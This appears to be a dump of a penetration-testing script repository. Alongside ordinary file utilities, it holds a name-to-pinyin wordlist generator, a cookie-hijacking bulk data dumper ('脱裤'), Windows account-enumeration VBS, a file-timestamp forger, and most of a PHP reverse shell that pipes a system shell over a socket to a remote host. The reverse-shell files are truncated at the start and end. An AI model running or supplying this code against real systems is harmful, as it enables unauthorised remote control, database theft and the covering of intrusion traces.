| wangming 355 | chenmei 356 | zhangchun 357 | liyang 358 | wangyan 359 | wangdong 360 | liufeng 361 | yangxue 362 | maxiu 363 | zhangshu 364 | lixiao 365 | zhangbo 366 | wangxin 367 | zhaoli 368 | zhanglin 369 | huangmin 370 | yangjuan 371 | wangjin 372 | zhoujie 373 | wanglei 374 | chenjian 375 | liumei 376 | yanggui 377 | sunxiu 378 | zhaojun 379 | zhaoyong 380 | liubing 381 | yangbin 382 | liwen 383 | chenlin 384 | chenping 385 | sunwei 386 | zhangli 387 | chenjun 388 | zhangnan 389 | liuyu 390 | zhaoxiu 391 | libo 392 | wangli 393 | zhangrong 394 | zhangfan 395 | zhangyu 396 | zhouyong 397 | zhangkun 398 | xuwei 399 | liuqin 400 | zhoujing 401 | xumin 402 | xujing 403 | yanghong 404 | wanglu 405 | zhangwen 406 | yangyan 407 | zhouli 408 | chenxin 409 | machao 410 | -------------------------------------------------------------------------------- /Python/top500/Top500Name_cn.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/top500/Top500Name_cn.txt -------------------------------------------------------------------------------- /Python/top500/main.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #top500中文名转全拼 3 | #使用:https://pypi.python.org/pypi/pinyin4py ps这个说明文档简直shit! 4 | 5 | 6 | from pinyin import * 7 | 8 | 9 | NameList=['张伟','王伟','王芳','李伟','李娜','张敏','李静','王静','刘伟','王秀英','张丽','李秀英','王丽','张静','张秀英','李强','王敏','李敏','王磊','刘洋','王艳','王勇','李军','张勇','李杰','张杰','张磊','王强','李娟','王军','张艳','张涛','王涛','李艳','王超','李明','李勇','王娟','刘杰','刘敏','李霞','李丽','张军','王杰','张强','王秀兰','王刚','王平','刘芳','张燕','刘艳','刘军','李平','王辉','王燕','陈静','刘勇','李玲','李桂英','王丹','李刚','李丹','李萍','王鹏','刘涛','陈伟','张华','刘静','李涛','王桂英','张秀兰','李红','李超','刘丽','张桂英','王玉兰','李燕','张鹏','李秀兰','张超','王玲','张玲','李华','王飞','张玉兰','王桂兰','王英','刘强','陈秀英','李英','李辉','李梅','陈勇','王鑫','李芳','张桂兰','李波','杨勇','王霞','李桂','王斌','李鹏','张平','张莉','张辉','张宇','刘娟','李斌','王浩','陈杰','王凯','陈丽','陈敏','王秀','李玉','刘秀','王萍','张波','刘桂','杨秀','张英','杨丽','张健','李俊','李莉','王波','张红','刘丹','李鑫','王莉','杨静','刘超','张娟','杨帆','刘燕','刘英','李雪','李秀','张鑫','王健','刘玉','刘辉','刘波','张浩','张明','陈燕','张霞','陈艳','杨杰','王帅','李慧','王雪','杨军','张旭','刘刚','王华','杨敏','王宁','李宁','王俊','刘斌','张萍','王婷','陈涛','王玉','王娜','张斌','陈龙','李林','张凤','王红','李凤','杨洋','李婷','张俊','王林','陈英','陈军','刘霞','陈浩','张凯','王晶','陈芳','张婷','杨涛','杨波','陈红','刘欢','陈娟','陈刚','王慧','张颖','张林','张娜','张玉','王凤','刘佳','刘磊','张倩','刘鹏','王旭','张雪','李阳','张秀','王梅','王建','王颖','刘平','杨梅','李飞','王亮','李磊','李建','王宇','陈玲','张建','刘鑫','王倩','张帅','李健','陈林','李洋','陈强','赵静','王成','陈超','陈亮','刘娜','王琴','张兰','张慧','刘畅','李倩','杨艳','张亮','李云','张琴','王兰','刘萍','陈桂','刘颖','杨超','张梅','陈平','刘红','赵伟','张云','张宁','杨林','张洁','高峰','杨阳','陈华','杨华','杨柳','刘阳','王淑','杨芳','李春','刘俊','王海','刘玲','陈晨','王欢','李冬','张龙','陈波','陈磊','王云','王峰','王瑞','李琴','陈鹏','王莹','刘飞','陈明','王桂','李浩','王志','张丹','李峰','刘凤','李佳','陈辉','张芳','李兰','陈玉','陈霞','刘凯','刘华','李兵','张雷','王东','王琳','李颖','杨伟','王龙','刘婷','陈秀','刘明','周敏','黄伟','张海','李志','杨磊','李晶','刘建','赵敏','陈云','李海','张桂','张晶','刘莉','李凯','张峰','张志','李龙','李帅','李欣','刘云','李洁','王春','陈斌','张莹','陈飞','王博','刘浩','黄秀','李淑','黄勇','周伟','李彬','王坤','刘慧','李想','张瑞','刘帅','张飞','王洋','陈洁','王荣','吴秀','杨明','马丽','刘倩','杨玲','杨平','王彬','李亮','李荣','李琳','李岩','王兵','王明','陈梅','张春','李杨','王岩','王冬','刘峰','杨雪','马秀','张淑','李小','张博','王欣','赵丽','张琳','黄敏','杨娟','王金','周杰','王雷','陈建','刘梅','杨桂','孙秀','赵军','赵勇','刘兵','杨斌','李文','陈琳','陈萍','孙伟','张利','陈俊','张楠','刘宇','赵秀','李博','王利','张荣','张帆','张瑜','周勇','张坤','徐伟','刘琴','周静','徐敏','徐静','杨红','王璐','张文','杨燕','周丽','陈鑫','马超'] 10 | 11 | s=Converter() 12 | 13 | f = open('top500Name.txt','w') 14 | for i in NameList: 15 | tmp = s.convert(i) 16 | tmp = tmp.split(' ') 17 | tmp = ''.join(tmp) 18 | print tmp 19 | f.write('%s\n'%tmp) 20 | f.close() 21 | -------------------------------------------------------------------------------- /Python/top500/pinyin/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import os 4 | import re 5 | 6 | _punctuation_mapper = dict(zip( 7 | u'?!。,、:《》“”‘’ ', 8 | u'?!.,,:<>""\'\' ')) 9 | 10 | def _load_character_mapper(): 11 | mapper = dict() 12 | filename = os.path.dirname(__file__) 13 | filename += '/chars.txt' 14 | f = open(filename) 15 | try: 16 | for line in f: 17 | if re.match('^[\s]*#', line): 18 | continue 19 | line = line.strip() 20 | columns = re.split('[\s(,)]+', line) 21 | ch = unichr(int(columns[0], 16)) 22 | pinyin = columns[1:-1] 23 | if len(pinyin) > 1: 24 | mapper[ch] = pinyin 25 | else: 26 | mapper[ch] = pinyin[0] 27 | finally: 28 | f.close() 29 | return mapper 30 | 31 | _character_mapper = _load_character_mapper() 32 | 33 | class Tokenizer: 34 | def __init__(self, text): 35 | assert isinstance(text, unicode) 36 | 37 | self._text = text 38 | self._pos = 0 39 | self._length = len(text) 40 | 41 | def __iter__(self): 42 | return self 43 | 44 | def next(self): 45 | if self._pos >= self._length: 46 | raise StopIteration 47 | 48 | i = self._pos 49 | type = self._char_type(self._text[i]) 50 | 51 | while True: 52 | i += 1 53 | if i >= self._length or self._char_type(self._text[i]) != type: 54 | break 55 | 56 | try: 57 | return type, self._text[self._pos:i] 58 | finally: 59 | self._pos = i 60 | 61 | def _char_type(self, ch): 62 | if re.match('[\s]', ch): 63 | return 4 64 | elif ch in _punctuation_mapper: 65 | return 3 66 | elif ord(ch) <= 255: 67 | return 1 68 | else: 69 | return 2 70 | 71 | class WordMapper: 72 | def __init__(self): 73 | self._mapper = dict() 74 | 75 | def load_from_file(self, filename): 76 | f = open(filename) 77 | try: 78 | for line in f: 79 | if re.match('^[\s]*#', line): 80 | continue 81 | line = line.strip() 82 | columns = re.split('[\s]+', line) 83 | word = unicode(columns[0], 'UTF-8') 84 | pinyin = columns[1:] 85 | self[word] = pinyin 86 | finally: 87 | f.close() 88 | 89 | def __setitem__(self, word, pinyin): 90 | assert isinstance(word, unicode) 91 | 92 | mapper = self._mapper 93 | for ch in word: 94 | if not ch in mapper: 95 | mapper[ch] = dict() 96 | mapper = mapper[ch] 97 | 98 | mapper['PY'] = pinyin 99 | 100 | def __getitem__(self, word): 101 | assert isinstance(word, unicode) 102 | 103 | length = len(word) 104 | 105 | pinyin = [] 106 | pos = 0 107 | last_pinyin = None 108 | last_pos = 0 109 | mapper = self._mapper 110 | 111 | while pos < length: 112 | ch = word[pos] 113 | if ch in mapper: 114 | mapper = mapper[ch] 115 | if 'PY' in mapper: 116 | last_pinyin = mapper['PY'] 117 | last_pos = pos 118 | pos += 1 119 | if pos < length: 120 | continue 121 | 122 | if last_pinyin is None: 123 | ch = word[last_pos] 124 | if ch in _character_mapper: 125 | last_pinyin = _character_mapper[ch] 126 | else: 127 | last_pinyin = ch 128 | if len(last_pinyin) > 1: 129 | pinyin.append(last_pinyin) 130 | else: 131 | pinyin.extend(last_pinyin) 132 | else: 133 | pinyin.extend(last_pinyin) 134 | 135 | pos = last_pos + 1 136 | mapper = self._mapper 137 | last_pinyin = None 138 | last_pos = pos 139 | 140 | if last_pinyin is not None: 141 | pinyin.extend(last_pinyin) 142 | 143 | return pinyin 144 | 145 | class Converter: 146 | def __init__(self, word_mapper=WordMapper()): 147 | self._word_mapper = word_mapper 148 | 149 | def load_word_file(self, filename): 150 | self._word_mapper.load_from_file(filename) 151 | 152 | def convert(self, text, fmt='df', sc=True, pp=False, fuzzy=0): 153 | if not isinstance(text, unicode): 154 | text = unicode(text, 'UTF-8') 155 | 156 | tokenizer = Tokenizer(text) 157 | tokens = map(self._convert_token, tokenizer) 158 | 159 | pinyin = '' 160 | last_type = 4 161 | for type, word in tokens: 162 | if type == 2: 163 | if last_type != 4: 164 | pinyin += ' ' 165 | pinyin += self._format_word(word, fmt, sc, pp, fuzzy) 166 | pass 167 | elif type == 3: 168 | pinyin += word 169 | elif type == 4: 170 | pinyin += word 171 | else: 172 | if last_type == 2: 173 | pinyin += ' ' 174 | pinyin += word 175 | 176 | last_type = type 177 | 178 | return pinyin 179 | 180 | def _convert_token(self, token): 181 | type, word = token 182 | if type == 2: 183 | return type, self._word_mapper[word] 184 | elif type == 3: 185 | return type, _punctuation_mapper[word] 186 | else: 187 | return type, word.encode('UTF-8') 188 | 189 | def _format_word(self, word, fmt, sc, pp, fuzzy): 190 | if pp and not sc: 191 | pinyin_set = set() 192 | pinyin_list = [None] * len(word) 193 | def func(idx): 194 | if idx >= len(word): 195 | pinyin_set.add(''.join(pinyin_list)) 196 | return 197 | ch = word[idx] 198 | if isinstance(ch, list): 199 | for c in ch: 200 | pinyin_list[idx] = self._format_ch(c, fmt, fuzzy) 201 | func(idx+1) 202 | else: 203 | pinyin_list[idx] = self._format_ch(ch, fmt, fuzzy) 204 | func(idx+1) 205 | func(0) 206 | return '|'.join(pinyin_set) 207 | 208 | def func(ch): 209 | if isinstance(ch, list): 210 | pinyin_list = [] 211 | if pp: 212 | for c in ch: 213 | pinyin_list.append(self._format_ch(c, fmt, fuzzy)) 214 | else: 215 | pinyin_list.append(self._format_ch(ch[0], fmt, fuzzy)) 216 | return '|'.join(set(pinyin_list)) 217 | else: 218 | return self._format_ch(ch, fmt, fuzzy) 219 | 220 | pinyin_list = map(func, word) 221 | if sc: 222 | return ' '.join(pinyin_list) 223 | else: 224 | return ''.join(pinyin_list) 225 | 226 | def _format_ch(self, ch, fmt, fuzzy): 227 | if fuzzy > 0: 228 | raise Exception('Not implemented') 229 | 230 | if fmt == 'df': 231 | return ch[:-1] 232 | 233 | if fmt == 'tn': 234 | return ch 235 | 236 | if fmt == 'fl': 237 | return ch[0] 238 | 239 | raise Exception('Not implemented') 240 | -------------------------------------------------------------------------------- /Python/top500/pinyin/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/top500/pinyin/__init__.pyc -------------------------------------------------------------------------------- /Python/修改文件名/加后缀.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os 3 | import os.path 4 | import sys 5 | rootdir = "." # 指明被遍历的文件夹 6 | sufix='.txt' 7 | thiefile=sys.argv[0][sys.argv[0].rfind(os.sep)+1:] 8 | 9 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 10 | for filename in filenames: 11 | if thiefile!=filename: 12 | print filename 13 | st=str( os.path.join(parent,filename)) #输出文件路径信息 14 | r = "/".join(st[1:].split("\\")) 15 | sorpath="."+r 16 | os.rename(sorpath,sorpath+".txt") 17 | 18 | 19 | -------------------------------------------------------------------------------- /Python/修改文件名/改成特定文件名.py.txt: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import sys, string, os, shutil 3 | #输入目录名和前缀名,重命名后的名称结构类似prefix_0001 4 | def RenameFiles(srcdir, prefix): 5 | srcfiles = os.listdir(srcdir) 6 | index = 1 7 | for srcfile in srcfiles: 8 | srcfilename = os.path.splitext(srcfile)[0][1:] 9 | sufix = os.path.splitext(srcfile)[1] 10 | #根据目录下具体的文件数修改%号后的值,"%04d"最多支持9999 11 | destfile = srcdir + "//" + prefix + "_%04d"%(index) + sufix 12 | srcfile = os.path.join(srcdir, srcfile) 13 | os.rename(srcfile, destfile) 14 | index += 1 15 | srcdir = "." 16 | prefix = "IMG_2011" 17 | RenameFiles(srcdir, prefix) 18 | -------------------------------------------------------------------------------- /Python/修改文件时间戳/单个.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os,sys,time 4 | from stat import * 5 | filename='./123.py' 6 | #指定期望修改后的时间 7 | TimeForChange = '2007-01-10 07:51:21' 8 | #转换时间格式为long型 9 | ConverTime = time.mktime(time.strptime( TimeForChange,'%Y-%m-%d %H:%M:%S') ) 10 | print TimeForChange+' 转换后:'+str(ConverTime) 11 | 12 | print '-------------修改前----------------' 13 | #创建时间 14 | print '创建时间 '+time.ctime(os.path.getctime(filename)) 15 | #最后修改时间 16 | print '修改时间 '+time.ctime(os.path.getmtime(filename)) 17 | #访问时间 18 | print '访问时间 '+time.ctime(os.path.getatime(filename)) 19 | 20 | #修改文件时间戳 21 | times=(ConverTime,ConverTime) 22 | #进行修改 23 | os.utime(filename, times) 24 | 25 | print '-------------修改后----------------' 26 | #创建时间 27 | print '创建时间 '+time.ctime(os.path.getctime(filename)) 28 | #最后修改时间 29 | print '修改时间 '+time.ctime(os.path.getmtime(filename)) 30 | #访问时间 31 | print '访问时间 '+time.ctime(os.path.getatime(filename)) 32 | #ref:http://2hei.net/mt/2008/12/wndows-use-python-edit-filetime.html -------------------------------------------------------------------------------- /Python/修改文件时间戳/批量当前目录.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os,sys,time 3 | from stat import * 4 | import os.path 5 | rootdir = "." # 指明被遍历的文件夹 6 | 7 | TimeForChange = '2015-05-20 13:14:01' 8 | ConverTime = time.mktime(time.strptime( TimeForChange,'%Y-%m-%d %H:%M:%S') ) 9 | times=(ConverTime,ConverTime) 10 | 11 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 12 | for filename in filenames: #输出文件信息 13 | st=str( os.path.join(parent,filename)) #输出文件路径信息 14 | r = "/".join(st[1:].split("\\")) 15 | filename = '.'+r 16 | os.utime(filename, times) 17 | #r.replace('ala_api',sss).replace('ALA_API',ttt) 18 | print filename 19 | #result.write(r+'\n') 20 | 21 | 22 | #result.close() 23 | -------------------------------------------------------------------------------- /Python/单个替换xml.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | 4 | os.chdir('d:\\') # 指定目录 5 | if not os.path.exists('pp.txt'): # 看一下这个文件是否存在 6 | exit(-1) #,不存在就退出 7 | 8 | lines = open('pp.txt').readlines() #打开文件,读入每一行 9 | 10 | fp = open('pp2.txt','w') #打开你要写得文件pp2.txt 11 | for s in lines: 12 | fp.write( s.replace('love','hate').replace('yes','no')) #替换两次 13 | fp.close() 14 | -------------------------------------------------------------------------------- /Python/处理iispwd/a.py: -------------------------------------------------------------------------------- 1 | import re 2 | import http.client 3 | 4 | def getResponseCode(url): 5 | conn = http.client.HTTPConnection(url,80,timeout=10) 6 | 7 | try: 8 | conn.request("GET", "/") 9 | r1 = conn.getresponse() 10 | return r1.status 11 | except: 12 | pass 13 | return 0 14 | 15 | 16 | 17 | 18 | 19 | 20 | def Readiispwd(filename,domainlist): 21 | 22 | f = open(filename) 23 | for line in f: 24 | #print (line) 25 | line = line.split(' ') 26 | #print (line) 27 | try: 28 | 29 | if len(line)<4: 30 | pass 31 | else: 32 | homelocate=line[len(line)-1] 33 | #print (homelocate) 34 | 35 | domainstring=line[len(line)-2].split(':') 36 | #print(domainstring) 37 | for j in domainstring: 38 | if len(j)<3: 39 | pass 40 | else: 41 | j=j.split('.') 42 | if len(j)==2: 43 | domainname='.'.join(j) 44 | domainname=domainname.split(',')[0] 45 | 46 | #print('%s\t%s'%(domainname,homelocate)) 47 | domainlist.append(domainname) 48 | domainlist.append(homelocate) 49 | 50 | 51 | else: 52 | pass 53 | 54 | 55 | except IndexError: 56 | pass 57 | f.close() 58 | ############################################ 59 | domainlist=[] 60 | Readiispwd('njwinweb10iispwd.txt',domainlist) 61 | #print (domainlist) 62 | print('200 response && domain domain location') 63 | result=open("result.txt",'a') 64 | for i in range(0,len(domainlist)-2,2): 65 | #print (i) 66 | if getResponseCode(domainlist[i])==200: 67 | result.write('%s\t%s\n'%(domainlist[i],domainlist[i+1])) 68 | print('%s\t%s'%(domainlist[i],domainlist[i+1])) 69 | 70 | 71 | result.close() 72 | 73 | -------------------------------------------------------------------------------- /Python/批量替换xml.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | 4 | os.chdir('d:\\tuniu.com\\ccc') 5 | 6 | if not os.path.exists('zbx_export_templates.xml'): 7 | exit(-1) 8 | 9 | lll =['pay_site_wap','pay_csahier_wap'] 10 | for i in lll: 11 | sss=i 12 | ttt = sss.upper() 13 | lines = open('zbx_export_templates.xml').readlines() 14 | 15 | fp = open(sss+'_export_templates.xml','w') 16 | for s in lines: 17 | fp.write( s.replace('ala_api',sss).replace('ALA_API',ttt)) 18 | fp.close() 19 | -------------------------------------------------------------------------------- /Python/目录扫描整理/Thumbs.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/目录扫描整理/Thumbs.db -------------------------------------------------------------------------------- /Python/目录扫描整理/del.py: -------------------------------------------------------------------------------- 1 | #-*- coding: UTF-8 -*- 2 | import shutil 3 | import os 4 | 5 | def delrep(source): 6 | 7 | destination = source+'rdv_bak' 8 | 9 | lines_seen = set() 10 | outfile = open("temp.xxoo", "w") 11 | 12 | for line in open(source, "r"): 13 | #print(line) 14 | if line not in lines_seen: 15 | outfile.write(line) 16 | lines_seen.add(line) 17 | 18 | outfile.close() 19 | os.renames(source,destination) 20 | os.renames( "temp.xxoo",source) 21 | 22 | from os import walk 23 | for dirpath, dirnames, filenames in walk('D:\\workspace\\目录扫描\\url字典\\'): 24 | #print ('Directory', dirpath) 25 | for filename in filenames: 26 | print (' File', dirpath+filename) 27 | if filename.split('.')[-1]=='txt' or filename.split('.')[-1]=='list': 28 | 29 | delrep(dirpath+filename) 30 | else: 31 | pass 32 | 33 | -------------------------------------------------------------------------------- /Python/目录扫描整理/temp.xxoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/目录扫描整理/temp.xxoo -------------------------------------------------------------------------------- /Python/目录扫描整理/删除乱码.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import codecs 3 | #f = codecs.open('D:\\workspace\\目录扫描\\布神php路径adminphp.txt') 4 | fileHandler = open('D:\\workspace\\目录扫描\\布神php路径adminphp (2).txt', 'r') #以读写方式处理文件IO 5 | fileHandler.seek(0) 6 | 7 | 8 | for i in range(1,10000): 9 | try: 10 | line = fileHandler.readline(i) 11 | print (line) 12 | except UnicodeDecodeError: 13 | print('xxxxx') 14 | 15 | 16 | fileHandler.close 17 | 18 | -------------------------------------------------------------------------------- /Python/目录扫描整理/删除同名hash同.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import os 4 | import hashlib 5 | from functools import partial 6 | from os import walk 7 | 8 | def md5sum(filename): 9 | with open(filename, mode='rb') as f: 10 | d = hashlib.md5() 11 | for buf in iter(partial(f.read, 128), b''): 12 | d.update(buf) 13 | return d.hexdigest() 14 | 15 | hashl=list() 16 | 17 | 18 | for dirpath, dirnames, filenames in walk('D:\\workspace\\目录扫描\\'): 19 | #print ('Directory', dirpath) 20 | for filename in filenames: 21 | print (' File', dirpath+filename) 22 | try: 23 | md=md5sum(dirpath+filename) 24 | if md in hashl: 25 | os.remove(dirpath+filename) 26 | else: 27 | hashl.append(md) 28 | print(md) 29 | except FileNotFoundError: 30 | pass 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | #print(md5sum('c:\\windows\\IME\\SPTIP.DLL')) 44 | -------------------------------------------------------------------------------- /Python/目录扫描整理/删除文件重复的行.py: -------------------------------------------------------------------------------- 1 | # 2 | import shutil 3 | import os 4 | source="综合目录.txt" 5 | 6 | destination = "bak_"+ source 7 | 8 | lines_seen = set() 9 | outfile = open("temp.txt", "w") 10 | for line in open(source, "r"): 11 | print(line) 12 | if line not in lines_seen: 13 | outfile.write(line) 14 | lines_seen.add(line) 15 | 16 | outfile.close() 17 | os.renames(source,destination) 18 | os.renames( "temp.txt",source) 19 | -------------------------------------------------------------------------------- /Python/脱裤py脚本/自定义cookie批量GET(POST).py: -------------------------------------------------------------------------------- 1 | #encoding=utf8 2 | import urllib 3 | import urllib2 4 | import cookielib 5 | import Cookie 6 | from cookielib import Cookie as libcookie 7 | 8 | def parse(rawstr,url): 9 | url = '.'+'.'.join(url.split('.')[1:]) 10 | c = Cookie.SimpleCookie() 11 | c.load(rawstr) 12 | ret = [] 13 | for k in c: 14 | #get v as Morsel Object 15 | v = c[k] 16 | ret.append(libcookie( 17 | name=v.key, 18 | value = v.value, 19 | version=0, 20 | port=None, 21 | port_specified = False, 22 | domain=url, 23 | domain_specified=True, 24 | domain_initial_dot=True, 25 | path='/', 26 | path_specified=True, 27 | secure=False, 28 | expires=None, 29 | discard=False, 30 | comment=None, 31 | comment_url=None, 32 | rest={'HttpOnly': None}, 33 | rfc2109=False, 34 | )) 35 | return ret 36 | 37 | 38 | 39 | 40 | ###登录页的url 41 | #lgurl = 'http://.com/ogi09' 42 | 43 | 44 | ###用cookielib模块创建一个对象,再用urlllib2模块创建一个cookie的handler 45 | cookie = cookielib.CookieJar() 46 | cs = parse("JSESSIONID=DC0B117570736F7120EF4679B1C06797",".com") 47 | for c in cs: 48 | cookie.set_cookie(c) 49 | print cookie 50 | cookieProc = urllib2.HTTPCookieProcessor(cookie) 51 | opener = urllib2.build_opener(cookieProc) 52 | urllib2.install_opener(opener) 53 | 54 | ###有些网站反爬虫,这里用headers把程序伪装成浏览器 55 | hds = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36' } 56 | 57 | ###登录需要提交的表单 58 | 59 | 60 | #req = urllib2.Request(url = lgurl,headers = hds) #伪装成浏览器,访问该页面,并POST表单数据,这里并没有实际访问,只是创建了一个有该功能的对象 61 | #opener = urllib2.build_opener(cookie_handler) #绑定handler,创建一个自定义的opener 62 | #response = opener.open(req)#请求网页,返回句柄 63 | #page = response.read()#读取并返回网页内容 64 | 65 | f = open('data.txt', 'a') 66 | for i in range(1,3956): 67 | print i 68 | dataurl = "http://l" % i 69 | req1 = urllib2.Request(url = dataurl,data = '',headers = hds) 70 | resp = opener.open(req1) 71 | page = resp.read() 72 | f.write(page) 73 | f.write("\n") 74 | print "\n" 75 | 76 | f.close() 77 | #print page #打印到终端显示 78 | -------------------------------------------------------------------------------- /Python/遍历子目录和路径.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os 3 | import os.path 4 | rootdir = "." # 指明被遍历的文件夹 5 | result = open('dir_result.txt','w') 6 | 7 | 8 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 9 | for filename in filenames: #输出文件信息 10 | st=str( os.path.join(parent,filename)) #输出文件路径信息 11 | r = "/".join(st[1:].split("\\")) 12 | print r 13 | result.write(r+'\n') 14 | 15 | for item in os.walk(rootdir): 16 | r = "/".join(item[0][1:].split("\\")) 17 | print r+'/' 18 | result.write(r+'/'+'\n') 19 | 20 | 21 | result.close() 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pentest Script 2 | 3 | - [Burp Suite 插件](https://github.com/xiaoxiaoleo/pentest-script/blob/master/Burp%20Suite%20Extender.md) -------------------------------------------------------------------------------- /Recon-windows/ping.vbs: -------------------------------------------------------------------------------- 1 | lists = " 2 | hostname1 3 | hostname2" 4 | 5 | aMachines = lists.split(vbCrLf.ToCharArray, System.StringSplitOptions.RemoveEmptyEntries) 6 | For Each machine in aMachines 7 | Set objPing = GetObject("winmgmts:{impersonationLevel=impersonate}")._ 8 | ExecQuery("select * from Win32_PingStatus where address = '"& machine & "'") 9 | For Each objStatus in objPing 10 | If IsNull(objStatus.StatusCode) or objStatus.StatusCode<>0 Then 11 | s1 = s1 &vbcr& machine 12 | Else 13 | s2 = s2 &vbcr& machine 14 | End If 15 | Next 16 | Next 17 | 18 | Set fso=CreateObject("Scripting.Filesystemobject") 19 | Set f=fso.CreateTextFile("c:\windows\temp\log.txt",True) 20 | f.Write "ping success£º"&vbCrLf&s2 21 | f.close 22 | 23 | 24 | WScript.Echo("c:\windows\temp\ping_log.txt") 25 | -------------------------------------------------------------------------------- /Recon-windows/user_detail_info.vbs: -------------------------------------------------------------------------------- 1 | On Error Resume Next 2 | Const ForReading = 1, ForWriting = 2 3 | Dim fso, f 4 | Set fso = CreateObject("Scripting.FileSystemObject") 5 | Set f = fso.OpenTextFile("testfile.txt", ForWriting, True) 6 | 7 | strComputer = "." 8 | Set objWMIService = GetObject("winmgmts:" _ 9 | & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 10 | 11 | Set colItems = objWMIService.ExecQuery _ 12 | ("Select * from Win32_UserAccount Where LocalAccount = True") 13 | 14 | For Each objItem in colItems 15 | f.WriteLine("Account Type: " & objItem.AccountType) 16 | f.WriteLine("Caption: " & objItem.Caption ) 17 | f.WriteLine("Description: " & objItem.Description ) 18 | f.WriteLine("Disabled: " & objItem.Disabled ) 19 | f.WriteLine("Domain: " & objItem.Domain ) 20 | f.WriteLine("Full Name: " & objItem.FullName ) 21 | f.WriteLine("InstallDate: " & objItem.InstallDate ) 22 | f.WriteLine("Local Account: " & objItem.LocalAccount ) 23 | f.WriteLine("Lockout: " & objItem.Lockout ) 24 | f.WriteLine("Name: " & objItem.Name ) 25 | f.WriteLine("Password Changeable: " & objItem.PasswordChangeable ) 26 | f.WriteLine("Password Expires: " & objItem.PasswordExpires ) 27 | f.WriteLine("Password Required: " & objItem.PasswordRequired ) 28 | f.WriteLine("SID: " & objItem.SID ) 29 | f.WriteLine("SID Type: " & objItem.SIDType ) 30 | f.WriteLine("Status: " & objItem.Status ) 31 | f.WriteLine(" ") 32 | 33 | Next 34 | 35 | f.Close 36 | -------------------------------------------------------------------------------- /ReverseShell/php-reverse-shell: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 99 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 100 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 101 | ); 102 | $process = proc_open($shell, $descriptorspec, $pipes); 103 | if (!is_resource($process)) { 104 | printit("ERROR: Can't spawn shell"); 105 | exit(1); 106 | } 107 | // Set everything to non-blocking 108 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 109 | stream_set_blocking($pipes[0], 0); 110 | stream_set_blocking($pipes[1], 0); 111 | stream_set_blocking($pipes[2], 0); 112 | stream_set_blocking($sock, 0); 113 | printit("Successfully opened reverse shell to $ip:$port"); 114 | while (1) { 115 | // Check for end of TCP connection 116 | if (feof($sock)) { 117 | printit("ERROR: Shell connection terminated"); 118 | break; 119 | } 120 | // Check for end of STDOUT 121 | if (feof($pipes[1])) { 122 | printit("ERROR: Shell process terminated"); 123 | break; 124 | } 125 | // Wait until a command is end down $sock, or some 126 | // command output is available on STDOUT or STDERR 127 | $read_a = array($sock, $pipes[1], $pipes[2]); 128 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 129 | // If we can read from the TCP socket, send 130 | // data to process's STDIN 131 | if (in_array($sock, $read_a)) { 132 | if ($debug) printit("SOCK READ"); 133 | $input = fread($sock, $chunk_size); 134 | if ($debug) printit("SOCK: $input"); 135 | fwrite($pipes[0], $input); 136 | } 137 | // If we can read from the process's STDOUT 138 | // send data down tcp connection 139 | if (in_array($pipes[1], $read_a)) { 140 | if ($debug) printit("STDOUT READ"); 141 | $input = fread($pipes[1], $chunk_size); 142 | if ($debug) printit("STDOUT: $input"); 143 | fwrite($sock, $input); 144 | } 145 | // If we can read from the process's STDERR 146 | // send data down tcp connection 147 | if (in_array($pipes[2], $read_a)) { 148 | if ($debug) printit("STDERR READ"); 149 | $input = fread($pipes[2], $chunk_size); 150 | if ($debug) printit("STDERR: $input"); 151 | fwrite($sock, $input); 152 | } 153 | } 154 | fclose($sock); 155 | fclose($pipes[0]); 156 | fclose($pipes[1]); 157 | fclose($pipes[2]); 158 | proc_close($process); 159 | // Like print, but does nothing if we've daemonised ourself 160 | // (I can't figure out how to redirect STDOUT like a proper daemon) 161 | function printit ($string) { 162 | if (!$daemon) { 163 | print "$string\n"; 164 | } 165 | } 166 | ?> 167 | -------------------------------------------------------------------------------- /ReverseShell/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 99 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 100 | 2 => array("pipe", "w") // 